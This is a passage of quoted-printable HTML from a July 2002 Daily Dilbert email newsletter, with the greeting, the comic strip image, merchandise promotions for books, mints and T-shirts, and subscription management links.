 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3De1-6RSNQxkAWvksspsPh9YLA-VXvsRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D0b-0NK-INQ=
 tdZcTyVUGfwmMRCSDiRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/19/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D35-d6z=
 TIbIKY4Eo2zSKNUL9GnZd-dRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D4a-HckUIPpQnXKEN2Rsx2LoDXIyJsRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D9e-tWXoQtMcJbr_PgNHSMNPZvdRBRRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc8=
 -2lZnQWOKdK1a6igMKj-WTl4_hdRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Df3-LjVgQJOyjRNozJLCsHCfK5y7mRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3D1d-6K_jIGQ_77NfrGHRlo87C_vUCsRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3D47-ADxxIIZm12E1FHEOiYGwl3BfJ9RR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D71-GwnUIEZQfBeyIRkqwFBR5r2YBdRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 9b-7-_FQSIx2x0BILu0dxVEtePG0dRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc5-8BrDQzO9FAiIAYMzS=
 dOdKosOusRR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Def-04eYQmkmvchl=
 1NbqBADe3LHJGRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002020897719.gif&amp;EmailDate=3DJuly=
 -19-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3D19-BLu0I2rrOlAddmRKMc2tI1KQRsRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D43-cop5=
 IBJ2EL8Ollz9ZOVLXA2MK9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002020897719.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D6e-2a7j=
 IyE52GnzeGlQAOKqepezPdRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D98-FTtOQ_z9bLhJ7dFCWOCgqPy-0sRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3Dc2-oXmLQUEO7X_Umy4gVixRTurLx9RR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dec=
 -MHsXQVyAA7_Ghex1k5qtYj5uGdRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D16=
 -T_rjI4c_Vq9k6fgDbeRw4HOD79RR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D40-6PL4Idn=
 NDzgLm6reVUCg0xbIKRRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3D55-TAoaIKJNXqrXkrdqmL6CXkTvzdRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D7f-bnCKIIPR7D59xYb9I53EfMgyU9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
